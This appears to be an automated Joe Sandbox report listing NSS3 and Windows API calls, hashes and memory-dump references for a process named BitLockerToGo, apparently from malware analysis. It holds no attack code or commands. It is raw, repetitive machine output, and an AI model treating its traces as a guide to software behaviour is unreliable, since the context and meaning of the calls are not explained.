                                                                                                                                                                                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(00000010), ref: 6C651D9C
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C651DB8
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Alloc_Util$Errorfree
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 939066016-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: ea1d833c1d06456501370f38d630067eb84e5f81d98db1f24bcc7201fd621c8d
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d764a7dea8b6073729df369b9eb279f3d1be287225ceb3c3e714be1b1376a340
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ea1d833c1d06456501370f38d630067eb84e5f81d98db1f24bcc7201fd621c8d
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4AF0F9B360521067FF102E599C41B8776D8AB85798F700335DD194BB40D760E81586EE
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(00000000,?,?,6C6A08AA,?), ref: 6C6988F6
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,6C6A08AA,?), ref: 6C69890B
                                                                                                                                                                                                                                                                                                                                                          • PR_NotifyCondVar.NSS3(?,?,?,?,?,6C6A08AA,?), ref: 6C698936
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,6C6A08AA,?), ref: 6C698940
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CondCriticalEnterNotifySectionUnlockValue
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 959714679-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: b76de75e6d008b3c04339c0ff21078ab008df6a71939c0a9e79c8f88c4e41575
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 7d57c2957aaec200f688c12527046a921b35d88c38c97a0e5a80b8b3a8fc2f97
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b76de75e6d008b3c04339c0ff21078ab008df6a71939c0a9e79c8f88c4e41575
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6F0184746046069FDB00AF3DC084659B7F4FF0A398F01066AE89987B10E734E894CBD6
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_CallOnce.NSS3(6C7A2F88,6C6D0660,00000020,00000000,?,?,6C6D2C3D,?,00000000,00000000,?,6C6D2A28,00000060,00000001), ref: 6C6D0860
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C5C4C70: TlsGetValue.KERNEL32(?,?,?,6C5C3921,6C7A14E4,6C70CC70), ref: 6C5C4C97
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C5C4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C5C3921,6C7A14E4,6C70CC70), ref: 6C5C4CB0
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C5C4C70: PR_Unlock.NSS3(?,?,?,?,?,6C5C3921,6C7A14E4,6C70CC70), ref: 6C5C4CC9
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(00000020,00000000,?,?,6C6D2C3D,?,00000000,00000000,?,6C6D2A28,00000060,00000001), ref: 6C6D0874
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00000001), ref: 6C6D0884
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C6D08A3
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalEnterSectionUnlockValue$CallOnce
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2502187247-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: e4d004a4d9041f7a67f0b73f0f68fe081f7a49673940ded1e0d2f44ced07e476
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 7e7b2dc36a26abc46190726c7ffe755ec94d8364e2c59c893cf3bb22bbbdd2bc
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e4d004a4d9041f7a67f0b73f0f68fe081f7a49673940ded1e0d2f44ced07e476
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E5012B75A00284ABEF002F65FC4495D7B38DB5B31EF190175FC0C52A02EF21A49487E9
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalDeleteSectionfree
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2988086103-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 2f299487198e86ae79cbea0ec4bf17a5099320efda04e5b489e2925e5eaa6227
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 6f79a401c65683a9705b038b2654255cf0e0dba2ba71524d02c4f6b8cfa9f1d6
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2f299487198e86ae79cbea0ec4bf17a5099320efda04e5b489e2925e5eaa6227
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 59E030767006089BCE10EFA8DC4488677ACEF4A2717150565E691C3700D231F905CBA1
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_value_text.NSS3 ref: 6C639E1F
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C5F13C0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,6C5C2352,?,00000000,?,?), ref: 6C5F1413
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C5F13C0: memcpy.VCRUNTIME140(00000000,R#\l,00000002,?,?,?,?,6C5C2352,?,00000000,?,?), ref: 6C5F14C0
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          • LIKE or GLOB pattern too complex, xrefs: 6C63A006
                                                                                                                                                                                                                                                                                                                                                          • ESCAPE expression must be a single character, xrefs: 6C639F78
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C694D57
                                                                                                                                                                                                                                                                                                                                                          • PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6C694DE6
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_value_text.NSS3(?), ref: 6C730917
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_value_text.NSS3(?), ref: 6C730923
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C5F13C0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,6C5C2352,?,00000000,?,?), ref: 6C5F1413
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C5F13C0: memcpy.VCRUNTIME140(00000000,R#\l,00000002,?,?,?,?,6C5C2352,?,00000000,?,?), ref: 6C5F14C0
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • SECOID_FindOIDByTag_Util.NSS3('8kl,00000000,00000000,?,?,6C6B3827,?,00000000), ref: 6C6B4D0A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6A08B4
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ItemsAreEqual_Util.NSS3(00000000,00000000,00000000), ref: 6C6B4D22
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69FD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6C641A3E,00000048,00000054), ref: 6C69FD56
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Util$Equal_ErrorFindItemsTag_memcmp
                                                                                                                                                                                                                                                                                                                                                          • String ID: '8kl
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1521942269-4107559852
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 14028aa1c084b1134f31e0fe545c68cf4cce508ec734b29011f619df16d7203e
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: c8d7fc3e2e47bad4948bbf04271b4fd4538cb2a714aabe690d5f93019bee7888
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 14028aa1c084b1134f31e0fe545c68cf4cce508ec734b29011f619df16d7203e
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6EF0623260122567EB104F6BAC80B6736DC9B427BDF150271ED28EB791E6B1CC1587E9
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_GetUniqueIdentity.NSS3(SSL), ref: 6C6DAF78
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C63ACC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C63ACE2
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C63ACC0: malloc.MOZGLUE(00000001), ref: 6C63ACEC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C63ACC0: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C63AD02
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C63ACC0: TlsGetValue.KERNEL32 ref: 6C63AD3C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C63ACC0: calloc.MOZGLUE(00000001,?), ref: 6C63AD8C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C63ACC0: PR_Unlock.NSS3 ref: 6C63ADC0
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C63ACC0: PR_Unlock.NSS3 ref: 6C63AE8C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C63ACC0: free.MOZGLUE(?), ref: 6C63AEAB
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(6C7A3084,6C7A02AC,00000090), ref: 6C6DAF94
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Unlock$IdentityUniqueValuecallocfreemallocmemcpystrcpystrlen
                                                                                                                                                                                                                                                                                                                                                          • String ID: SSL
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2424436289-2135378647
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: c8fecbdf8748ff9954ea1c44c0a1f2cb3d32278650918942c0fc0644176a1992
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: a37cf5054e64b4dbd33b6cb4265ffc0676907bbe8b1aeed3059d4f57392c46e8
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c8fecbdf8748ff9954ea1c44c0a1f2cb3d32278650918942c0fc0644176a1992
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 37215CB2605A48EECB10DFD3B54731BBB72BB82249712512CD11A4BB29D731E004AFD9
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • CERT_CheckCertValidTimes.NSS3(?,00000000,-00000078,00000000,?,00000000,]dl,6C646499,-00000078,00000000,?,?,]dl,?,6C645DEF,?), ref: 6C64C821
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C641DD0: DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C641E0B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C641DD0: DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C641E24
                                                                                                                                                                                                                                                                                                                                                          • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,00000000,?,?,]dl,?,6C645DEF,?,?,?), ref: 6C64C857
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Choice_DecodeTimeUtil$CertCheckDestroyPublicTimesValid
                                                                                                                                                                                                                                                                                                                                                          • String ID: ]dl
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 221937774-179191621
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_GetPageSize.NSS3(6C630936,FFFFE8AE,?,6C5C16B7,00000000,?,6C630936,00000000,?,6C5C204A), ref: 6C630F1B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C631370: GetSystemInfo.KERNEL32(?,?,?,?,6C630936,?,6C630F20,6C630936,FFFFE8AE,?,6C5C16B7,00000000,?,6C630936,00000000), ref: 6C63138F
                                                                                                                                                                                                                                                                                                                                                          • PR_NewLogModule.NSS3(clock,6C630936,FFFFE8AE,?,6C5C16B7,00000000,?,6C630936,00000000,?,6C5C204A), ref: 6C630F25
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C631110: calloc.MOZGLUE(00000001,0000000C,?,?,?,?,?,?,?,?,?,?,6C630936,00000001,00000040), ref: 6C631130
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C631110: strdup.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,6C630936,00000001,00000040), ref: 6C631142
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C631110: PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES,?,?,?,?,?,?,?,?,?,?,?,?,?,6C630936,00000001), ref: 6C631167
                                                                                                                                                                                                                                                                                                                                                          Strings
Memory Dump Source
• Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
• Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: InfoModulePageSecureSizeSystemcallocstrdup
                                                                                                                                                                                                                                                                                                                                                          • String ID: clock
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 536403800-3195780754
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Value$calloc
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3339632435-0
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C642AF5,?,?,?,?,?,6C640A1B,00000000), ref: 6C6A0F1A
                                                                                                                                                                                                                                                                                                                                                          • malloc.MOZGLUE(00000001), ref: 6C6A0F30
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C6A0F42
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C6A0F5B
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Valuemallocmemcpystrlen
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2332725481-0